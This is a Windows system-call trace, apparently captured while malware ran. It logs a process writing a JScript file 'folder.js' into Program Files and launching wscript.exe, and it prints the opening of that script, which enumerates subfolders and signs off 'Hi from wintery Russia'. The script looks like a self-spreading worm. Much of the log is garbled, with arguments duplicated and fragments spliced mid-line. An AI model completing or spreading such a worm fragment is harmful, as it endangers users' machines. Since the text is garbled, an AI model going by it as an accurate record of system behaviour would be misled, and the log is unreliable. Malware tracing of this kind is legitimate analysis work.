 01115   456   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1244420,  (0x40100080, {24, 0, 0x40, 0, 1244420, "\??\C:\Program Files\folder.js"}, 0x0, 0, 1, 5, 96, 0, 0, ... }, 0x0, 0, 1, 5, 96, 0, 0, ...
 01116   456   NtClose  (-2147482028, ... ) == 0x0
 01115   456   NtCreateFile  ... 96, {status=0x0, info=2}, ) == 0x0
 01117   456   NtSetInformationFile  (76, 1244396, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 01118   456   NtReadFile  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4},  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4}, "m\4\0\200", ) , ) == 0x0
 01119   456   NtReadFile  (76, 0, 0, 0, 1133, 0x0, 0, ... {status=0x0, info=1133},  (76, 0, 0, 0, 1133, 0x0, 0, ... {status=0x0, info=1133}, "\225V_k\333V\24\177N \337\341LP\220q\252\246\177\6k\263l\204$\335\36J7\346B\7i\36d\373:V&K\331\225\344\324\33{\30\14\6c02\366\1T\325\2427r,\177%Kn\222\215\214\231~\203\235s\257d;\244\31\354\301?\373\336{\376\237\363\273\327\255\300i\370\226\353\0g\276\311\367\365\12|\277\262\274\32459\340\312\203\15x^kp\353\32076\371~\320a\216\357\255\3439\12\7\334\221"\306\23\346\354\373m\370\4\326\340S\271\243\257U\340\21h\32\12\376\260\262\274\262|\347\16|nA\213\273\358\262\34\237\361\36|\25x\236e\302\243Jee\231|\265<\27]9\354\1061\232.\373\372\213\372\1k\370\272\246\234[\316\276\361\330\262Y\255\347\371\254\243\316\264\312za\374\3678\231\374%N \11\363p\220\276.,\272v\223q4\212\246\215\317\230\377X\256u\315x\361b\256\371[<\216\317\322>\2449l\271\266\315T%Fi\2770\225F\220\300&\347f\357\312\246\362\340\5u\345\304+C'A\235\214\263bg\307\301\222q\323w\271\256D\215ZPW\221x$\327r9\350\353\360\13L\177\307i\242.0\243\343v\331S\366\322\327\2518Ks/\306a\340\265ufXX\2<+s\370c2L\316\305\24\372\203)d\3518\27\3434J\4\3143\30\245\320\17\363\30\17\337\364\303\241\230\242\333\262\347M\213{.\367us\25\352\330x(\332\252\233\306\266\351\263-\316\20\233p\33\352\213k\14\262l\353\261\3647\211OKwbey!`i\273\360Q)T~\214\307\357N!\213\307\342dxy\2\303\3644\36C$\206\27q\226\307\343\260(-\343\226iS\363T\325\2669\316\204Q\223\273O\203N\35\267|\267\346s\234\13}V\210", ) \306\23\346\354\373m\370\4\326\340S\271\243\257U\340\21h\32\12\376\260\262\274\262|\347\16|nA\213\273\358\262\34\237\361\36|\25x\236e\302\243Jee\231|\265<\27]9\354\1061\232.\373\372\213\372\1k\370\272\246\234[\316\276\361\330\262Y\255\347\371\254\243\316\264\312za\374\3678\231\374%N \11\363p\220\276.,\272v\223q4\212\246\215\317\230\377X\256u\315x\361b\256\371[<\216\317\322>\2449l\271\266\315T%Fi\2770\225F\220\300&\347f\357\312\246\362\340\5u\345\304+C'A\235\214\263bg\307\301\222q\323w\271\256D\215ZPW\221x$\327r9\350\353\360\13L\177\307i\242.0\243\343v\331S\366\322\327\2518Ks/\306a\340\265ufXX\2<+s\370c2L\316\305\24\372\203)d\3518\27\3434J\4\3143\30\245\320\17\363\30\17\337\364\303\241\230\242\333\262\347M\213{.\367us\25\352\330x(\332\252\233\306\266\351\263-\316\20\233p\33\352\213k\14\262l\353\261\3647\211OKwbey!`i\273\360Q)T~\214\307\357N!\213\307\342dxy\2\303\3644\36C$\206\27q\226\307\343\260(-\343\226iS\363T\325\2669\316\204Q\223\273O\203N\35\267|\267\346s\234\13}V\210", ) == 0x0
 01120   456   NtWriteFile  (96, 0, 0, 0,  (96, 0, 0, 0, "function retarg() {\15\12\11var args = WScript.Arguments;\15\12\11return args.Length > 0 ? args(0) : "";\15\12}\15\12\15\12// Hi from wintery Russia :))\15\12var fso = new ActiveXObject("Scripting.FileSystemObject");\15\12\15\12// \222\245\252\343\351\250\251 \252\240\342\240\253\256\243\15\12var folder = fso.GetFolder(".\\");\15\12\15\12// \217\245\340\245\345\256\244 \256\342 Collection \257\256\244\252\240\342\240\253\256\243\256\242 \252 Array \257\256\244\252\240\342\240\253\256\243\256\242\15\12var subfolders = new Array();\15\12e = new Enumerator(folder.SubFolders);\15\12for (; !e.atEnd(); e.moveNext())\15\12\11subfolders.push(e.item());\15\12\15\12// \224\343\255\252\346\250\357 \244\253\357 \341\256\340\342\250\340\256\242\252\250 \252\240\342\240\253\256\243\256\242 \257\256 \244\240\342\245 \341\256\247\244\240\255\250\357\15\12", 2231, 0x0, 0, ... {status=0x0, info=2231}, )  (96, 0, 0, 0, "function retarg() {\15\12\11var args = WScript.Arguments;\15\12\11return args.Length > 0 ? args(0) : "";\15\12}\15\12\15\12// Hi from wintery Russia :))\15\12var fso = new ActiveXObject("Scripting.FileSystemObject");\15\12\15\12// \222\245\252\343\351\250\251 \252\240\342\240\253\256\243\15\12var folder = fso.GetFolder(".\\");\15\12\15\12// \217\245\340\245\345\256\244 \256\342 Collection \257\256\244\252\240\342\240\253\256\243\256\242 \252 Array \257\256\244\252\240\342\240\253\256\243\256\242\15\12var subfolders = new Array();\15\12e = new Enumerator(folder.SubFolders);\15\12for (; !e.atEnd(); e.moveNext())\15\12\11subfolders.push(e.item());\15\12\15\12// \224\343\255\252\346\250\357 \244\253\357 \341\256\340\342\250\340\256\242\252\250 \252\240\342\240\253\256\243\256\242 \257\256 \244\240\342\245 \341\256\247\244\240\255\250\357\15\12", 2231, 0x0, 0, ... {status=0x0, info=2231}, ) Scripting.FileSystemObject (96, 0, 0, 0, "function retarg() {\15\12\11var args = WScript.Arguments;\15\12\11return args.Length > 0 ? args(0) : "";\15\12}\15\12\15\12// Hi from wintery Russia :))\15\12var fso = new ActiveXObject("Scripting.FileSystemObject");\15\12\15\12// \222\245\252\343\351\250\251 \252\240\342\240\253\256\243\15\12var folder = fso.GetFolder(".\\");\15\12\15\12// \217\245\340\245\345\256\244 \256\342 Collection \257\256\244\252\240\342\240\253\256\243\256\242 \252 Array \257\256\244\252\240\342\240\253\256\243\256\242\15\12var subfolders = new Array();\15\12e = new Enumerator(folder.SubFolders);\15\12for (; !e.atEnd(); e.moveNext())\15\12\11subfolders.push(e.item());\15\12\15\12// \224\343\255\252\346\250\357 \244\253\357 \341\256\340\342\250\340\256\242\252\250 \252\240\342\240\253\256\243\256\242 \257\256 \244\240\342\245 \341\256\247\244\240\255\250\357\15\12", 2231, 0x0, 0, ... {status=0x0, info=2231}, ) .\\ (96, 0, 0, 0, "function retarg() {\15\12\11var args = WScript.Arguments;\15\12\11return args.Length > 0 ? args(0) : "";\15\12}\15\12\15\12// Hi from wintery Russia :))\15\12var fso = new ActiveXObject("Scripting.FileSystemObject");\15\12\15\12// \222\245\252\343\351\250\251 \252\240\342\240\253\256\243\15\12var folder = fso.GetFolder(".\\");\15\12\15\12// \217\245\340\245\345\256\244 \256\342 Collection \257\256\244\252\240\342\240\253\256\243\256\242 \252 Array \257\256\244\252\240\342\240\253\256\243\256\242\15\12var subfolders = new Array();\15\12e = new Enumerator(folder.SubFolders);\15\12for (; !e.atEnd(); e.moveNext())\15\12\11subfolders.push(e.item());\15\12\15\12// \224\343\255\252\346\250\357 \244\253\357 \341\256\340\342\250\340\256\242\252\250 \252\240\342\240\253\256\243\256\242 \257\256 \244\240\342\245 \341\256\247\244\240\255\250\357\15\12", 2231, 0x0, 0, ... {status=0x0, info=2231}, ) , 2231, 0x0, 0, ... {status=0x0, info=2231}, ) == 0x0
 01121   456   NtSetInformationFile  (96, 1244488, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 01122   456   NtClose  (96, ... ) == 0x0
 01123   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files"}, 1244424, ... ) }, 1244424, ... ) == 0x0
 01124   456   NtQueryInformationJobObject  (0, BasicUIRestrictions, 4, ... ) == STATUS_ACCESS_DENIED
 01125   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wscript.exe"}, 1240872, ... ) }, 1240872, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01126   456   NtQueryAttributesFile  ({24, 84, 0x40, 0, 0,  ({24, 84, 0x40, 0, 0, "wscript.exe"}, 1240872, ... ) }, 1240872, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01127   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 1240872, ... ) }, 1240872, ... ) == 0x0
 01128   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 1241588, ... ) }, 1241588, ... ) == 0x0
 01129   456   NtOpenFile  (0x1000a1, {24, 0, 0x40, 0, 0,  (0x1000a1, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 5, 96, ... 96, {status=0x0, info=1}, ) }, 5, 96, ... 96, {status=0x0, info=1}, ) == 0x0
 01130   456   NtCreateSection  (0xf001f, 0x0, 0x0, 16, 16777216, 96, ... 100, ) == 0x0
 01131   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01132   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility"}, ... 104, ) }, ... 104, ) == 0x0
 01133   456   NtQueryValueKey  (104,  (104, "DisableAppCompat", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01134   456   NtClose  (104, ... ) == 0x0
 01135   456   NtQueryVolumeInformationFile  (96, 1240896, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 01136   456   NtOpenMutant  (0x120001, {24, 64, 0x0, 0, 0,  (0x120001, {24, 64, 0x0, 0, 0, "ShimCacheMutex"}, ... 104, ) }, ... 104, ) == 0x0
 01137   456   NtWaitForSingleObject  (104, 0, {-1000000, -1}, ... ) == 0x0
 01138   456   NtOpenSection  (0x2, {24, 64, 0x0, 0, 0,  (0x2, {24, 64, 0x0, 0, 0, "ShimSharedMemory"}, ... 108, ) }, ... 108, ) == 0x0
 01139   456   NtMapViewOfSection  (108, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0x940000), {0, 0}, 57344, ) == 0x0
 01140   456   NtReleaseMutant  (104, ... 0x0, ) == 0x0
 01141   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1238880, ... ) }, 1238880, ... ) == 0x0
 01142   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 112, {status=0x0, info=1}, ) }, 5, 96, ... 112, {status=0x0, info=1}, ) == 0x0
 01143   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 112, ... 116, ) == 0x0
 01144   456   NtClose  (112, ... ) == 0x0
 01145   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x950000), 0x0, 106496, ) == 0x0
 01146   456   NtClose  (116, ... ) == 0x0
 01147   456   NtUnmapViewOfSection  (-1, 0x950000, ... ) == 0x0
 01148   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1239196, ... ) }, 1239196, ... ) == 0x0
 01149   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 116, {status=0x0, info=1}, ) }, 5, 96, ... 116, {status=0x0, info=1}, ) == 0x0
 01150   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 116, ... 112, ) == 0x0
 01151   456   NtQuerySection  (112, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01152   456   NtClose  (116, ... ) == 0x0
 01153   456   NtMapViewOfSection  (112, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x75f40000), 0x0, 118784, ) == 0x0
 01154   456   NtClose  (112, ... ) == 0x0
 01155   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\sysmain.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... 112, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 112, {status=0x0, info=1}, ) == 0x0
 01156   456   NtQueryInformationFile  (112, 1239484, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01157   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 112, ... 116, ) == 0x0
 01158   456   NtMapViewOfSection  (116, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x9b0000), 0x0, 1028096, ) == 0x0
 01159   456   NtQueryInformationFile  (112, 1239580, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01160   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\systest.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... ) }, 0x0, 128, 1, 1, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01161   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 01162   456   NtQueryInformationProcess  (-1, Wow64, 4, ... {process info, class 26, size 4}, 0x0, ) == 0x0
 01163   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01164   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1237144, 616, BothDirectory, 1,  (120, 0, 0, 0, 1237144, 616, BothDirectory, 1, "wscript.exe", 0, ... {status=0x0, info=116}, ) , 0, ... {status=0x0, info=116}, ) == 0x0
 01165   456   NtClose  (120, ... ) == 0x0
 01166   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01167   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01168   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 1236532, ... ) }, 1236532, ... ) == 0x0
 01169   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01170   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1,  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01171   456   NtClose  (120, ... ) == 0x0
 01172   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01173   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1,  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1, "System32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 01174   456   NtClose  (120, ... ) == 0x0
 01175   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01176   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1,  (120, 0, 0, 0, 1235892, 616, BothDirectory, 1, "wscript.exe", 0, ... {status=0x0, info=116}, ) , 0, ... {status=0x0, info=116}, ) == 0x0
 01177   456   NtClose  (120, ... ) == 0x0
 01178   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01179   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01180   456   NtQueryInformationProcess  (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0
 01181   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01182   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 120, ) == 0x0
 01183   456   NtQueryInformationToken  (120, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01184   456   NtClose  (120, ... ) == 0x0
 01185   456   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01186   456   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\wscript.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01187   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01188   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01189   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\wscript.exe"}, 1238812, ... ) }, 1238812, ... ) == 0x0
 01190   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01191   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1,  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 01192   456   NtClose  (120, ... ) == 0x0
 01193   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01194   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1,  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1, "System32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 01195   456   NtClose  (120, ... ) == 0x0
 01196   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\"}, 3, 16417, ... 120, {status=0x0, info=1}, ) }, 3, 16417, ... 120, {status=0x0, info=1}, ) == 0x0
 01197   456   NtQueryDirectoryFile  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1,  (120, 0, 0, 0, 1238172, 616, BothDirectory, 1, "wscript.exe", 0, ... {status=0x0, info=116}, ) , 0, ... {status=0x0, info=116}, ) == 0x0
 01198   456   NtClose  (120, ... ) == 0x0
 01199   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01200   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01201   456   NtWaitForSingleObject  (104, 0, {-1000000, -1}, ... ) == 0x0
 01202   456   NtQueryVolumeInformationFile  (96, 1239456, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 01203   456   NtQueryInformationFile  (96, 1239436, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 01204   456   NtQueryInformationFile  (96, 1239476, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01205   456   NtReleaseMutant  (104, ... 0x0, ) == 0x0
 01206   456   NtUnmapViewOfSection  (-1, 0x9b0000, ... ) == 0x0
 01207   456   NtClose  (116, ... ) == 0x0
 01208   456   NtClose  (112, ... ) == 0x0
 01209   456   NtQuerySection  (100, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01210   456   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01211   456   NtOpenThreadToken  (-2, 0x2000000, 1, ... ) == STATUS_NO_TOKEN
 01212   456   NtOpenProcessToken  (-1, 0xa, ... 112, ) == 0x0
 01213   456   NtQueryInformationToken  (112, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0
 01214   456   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01215   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 116, ) }, ... 116, ) == 0x0
 01216   456   NtQueryValueKey  (116,  (116, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (116, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01217   456   NtQueryValueKey  (116,  (116, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (116, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01218   456   NtClose  (116, ... ) == 0x0
 01219   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 116, ) }, ... 116, ) == 0x0
 01220   456   NtQueryValueKey  (116,  (116, "ExecutableTypes", Partial, 0, ... ) , Partial, 0, ... ) == STATUS_BUFFER_TOO_SMALL
 01221   456   NtQueryValueKey  (116,  (116, "ExecutableTypes", Partial, 260, ... TitleIdx=0, Type=7, Data="A\0D\0E\0\0\0A\0D\0P\0\0\0B\0A\0S\0\0\0B\0A\0T\0\0\0C\0H\0M\0\0\0C\0M\0D\0\0\0C\0O\0M\0\0\0C\0P\0L\0\0\0C\0R\0T\0\0\0E\0X\0E\0\0\0H\0L\0P\0\0\0H\0T\0A\0\0\0I\0N\0F\0\0\0I\0N\0S\0\0\0I\0S\0P\0\0\0L\0N\0K\0\0\0M\0D\0B\0\0\0M\0D\0E\0\0\0M\0S\0C\0\0\0M\0S\0I\0\0\0M\0S\0P\0\0\0M\0S\0T\0\0\0O\0C\0X\0\0\0P\0C\0D\0\0\0P\0I\0F\0\0\0R\0E\0G\0\0\0S\0C\0R\0\0\0S\0H\0S\0\0\0U\0R\0L\0\0\0V\0B\0\0\0W\0S\0C\0\0\0\0\0"}, 260, ) , Partial, 260, ... TitleIdx=0, Type=7, Data= (116, "ExecutableTypes", Partial, 260, ... TitleIdx=0, Type=7, Data="A\0D\0E\0\0\0A\0D\0P\0\0\0B\0A\0S\0\0\0B\0A\0T\0\0\0C\0H\0M\0\0\0C\0M\0D\0\0\0C\0O\0M\0\0\0C\0P\0L\0\0\0C\0R\0T\0\0\0E\0X\0E\0\0\0H\0L\0P\0\0\0H\0T\0A\0\0\0I\0N\0F\0\0\0I\0N\0S\0\0\0I\0S\0P\0\0\0L\0N\0K\0\0\0M\0D\0B\0\0\0M\0D\0E\0\0\0M\0S\0C\0\0\0M\0S\0I\0\0\0M\0S\0P\0\0\0M\0S\0T\0\0\0O\0C\0X\0\0\0P\0C\0D\0\0\0P\0I\0F\0\0\0R\0E\0G\0\0\0S\0C\0R\0\0\0S\0H\0S\0\0\0U\0R\0L\0\0\0V\0B\0\0\0W\0S\0C\0\0\0\0\0"}, 260, ) }, 260, ) == 0x0
 01222   456   NtClose  (116, ... ) == 0x0
 01223   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\LevelObjects"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01224   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 116, ) }, ... 116, ) == 0x0
 01225   456   NtQueryValueKey  (116,  (116, "Levels", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01226   456   NtClose  (116, ... ) == 0x0
 01227   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01228   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01229   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01230   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01231   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01232   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01233   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01234   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01235   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01236   456   NtQueryDefaultLocale  (1, 1240268, ... ) == 0x0
 01237   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... 116, ) }, ... 116, ) == 0x0
 01238   456   NtEnumerateKey  (116, 0, Basic, 280, ... {LastWrite={0x6f7a111e,0x1c73999}, TitleIdx=0, Name= (116, 0, Basic, 280, ... {LastWrite={0x6f7a111e,0x1c73999}, TitleIdx=0, Name="{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, 92, ) }, 92, ) == 0x0
 01239   456   NtOpenKey  (0x20019, {24, 116, 0x40, 0, 0,  (0x20019, {24, 116, 0x40, 0, 0, "{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, ... 120, ) }, ... 120, ) == 0x0
 01240   456   NtQueryValueKey  (120,  (120, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) , Partial, 280, ... TitleIdx=0, Type=2, Data= (120, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) }, 202, ) == 0x0
 01241   456   NtQueryValueKey  (120,  (120, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (120, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01242   456   NtClose  (120, ... ) == 0x0
